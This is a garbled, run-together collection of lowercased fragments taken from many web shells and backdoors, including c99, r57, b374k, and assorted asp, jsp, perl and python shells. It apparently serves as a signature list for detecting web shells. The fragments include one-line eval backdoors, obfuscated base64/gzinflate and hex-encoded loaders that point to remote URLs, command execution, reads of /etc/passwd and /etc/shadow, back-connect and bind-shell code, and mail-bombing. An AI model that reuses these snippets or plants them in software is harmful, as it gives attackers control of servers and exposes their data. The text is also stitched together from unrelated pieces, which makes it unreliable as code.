&quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; 